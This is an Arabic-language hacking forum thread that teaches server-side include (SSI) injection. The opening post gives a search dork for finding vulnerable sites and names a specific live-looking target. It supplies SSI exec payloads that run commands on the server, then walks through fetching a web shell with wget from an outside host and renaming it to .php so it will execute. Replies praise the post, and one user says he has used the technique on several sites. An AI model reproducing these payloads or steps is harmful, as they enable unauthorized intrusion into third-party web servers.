:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   حقن xss - ssi (http://www.vbspiders.com/vb/f427.html)
-   -   قنبلة : شرح ثغرات من نوع ssi Injection (http://www.vbspiders.com/vb/t65348.html)

Injection 10-29-2012 09:21 AM

قنبلة : شرح ثغرات من نوع ssi Injection
 
السلام عليكم ورحمة الله وبركاتة

كيف الحال ؟

الموضوع محتاج فقط كاسه شاي

دورك بسيط : inurl:bin/Cklb/

ملاحضة : الموضوع ولفكرة مقتبسة من موقع اجنبي #

اكواد ممكن ان تستعملها

كود PHP:

<!--#echo var="DATE_LOCAL" -->
Will display the Date

<!--#exec cmd="whoami"--> 
Will show which user is running on the server

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux) 
Will display all files in the directory

<!-- #exec cmd="dir" --> (Windows) 
Will display all files in the directory 

هذا موقع للتطبيق #

http://dev.stockphotosamerica.com/bin/Cklb

نطبق الكود الثاني في الدخول

كود PHP:

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> 

نشوف

http://img843.imageshack.us/img843/6673/regionyo.png

http://img4.imageshack.us/img4/8881/regionoq.png

تمام الحين تاكدنا انه الثغرة موجودة وكل شيء تمام خلونا نجرب نرفع الشل

نفذ التالي

كود PHP:

<!--#exec cmd="wget http://website.com/dir/shell.txt" --> 

http://img135.imageshack.us/img135/3338/regiontv.png

خلونا نشوف اذا الملف اذا انرفع ولالا

عن طريق امر

كود PHP:

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> 

http://img690.imageshack.us/img690/2006/regionwt.png

تمام انرفع بنجاح بس انرفع بصيغة تكست نفذ الامر التالي لنحولة الى بي اتش بي

كود PHP:

<!--#exec cmd="mv shell.txt shell.php" --> 

ونتاكد الان

http://img803.imageshack.us/img803/2275/regionr.png

استعرض

http://img339.imageshack.us/img339/3094/regioncw.png

اتمنة وصلت المعلومة لكم كامل الاحترام والتقدير

اخوكم حمد المهندي





mido868 10-29-2012 11:51 AM

رد: قنبلة : شرح ثغرات من نوع ssi Injection
 
تم التقييم ياغالى

bscbsc 10-29-2012 05:10 PM

رد: قنبلة : شرح ثغرات من نوع ssi Injection
 
يعطيك العآفيه اخوي

دام علاء العماد 10-29-2012 09:09 PM

رد: قنبلة : شرح ثغرات من نوع ssi Injection
 
موضوع قوي و رائع ، بارك الله فيك يا أخي الكريم و جزاك الله عنا كل خير

Dr.Bat 10-30-2012 02:53 AM

رد: قنبلة : شرح ثغرات من نوع ssi Injection
 
وحش ياغالي واصل الي لامام

Cyber Code 10-30-2012 03:34 AM

رد: قنبلة : شرح ثغرات من نوع ssi Injection
 
جربت هالثغره من قبل على كم موقع , وفعلا ماقريت من قبل شخصياً موقع عربي شارح عنها شيء,
ملاحضة بسيطه ssi اختصار ل "server side include" وعادتا بالاصح الثغره بنستغلها في حال كان صيغة الصفحة (.shtml) وبنقدر ننفذ اوامر كانها remote code execution مثل ماموضح فوق.

واصل اخ حمد وإلى الأمام .

abdoog 11-03-2012 11:03 PM

رد: قنبلة : شرح ثغرات من نوع ssi Injection
 
مشكوووور عالشرح وبارك الله فيك

sami hack 11-04-2012 11:01 PM

رد: قنبلة : شرح ثغرات من نوع ssi Injection
 
مشكوووور يالغلا ع الشرح وواصل تألقك

hitsKy 11-06-2012 09:37 PM

رد: قنبلة : شرح ثغرات من نوع ssi Injection
 
مشكووووووووووور

Injection 11-13-2012 03:32 PM

رد: قنبلة : شرح ثغرات من نوع ssi Injection
 
منورين حبايب قلبي ..

sH3LL 11-14-2012 01:29 PM

رد: قنبلة : شرح ثغرات من نوع ssi Injection
 
lبارك الله فيك على الشرح

Mr,Talal 11-16-2012 12:51 PM

رد: قنبلة : شرح ثغرات من نوع ssi Injection
 
:icon30::موضوع اكثر من رائع

SaMI-php 11-20-2012 04:39 AM

رد: قنبلة : شرح ثغرات من نوع ssi Injection
 
جاري المتايعه

inshtaine 11-20-2012 04:49 PM

رد: قنبلة : شرح ثغرات من نوع ssi Injection
 
اخي موضوع جميل
تم التقييم ياغالى

essalhi saw 11-21-2012 12:20 AM

رد: قنبلة : شرح ثغرات من نوع ssi Injection
 
goooooooooooooooood


الساعة الآن 10:14 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0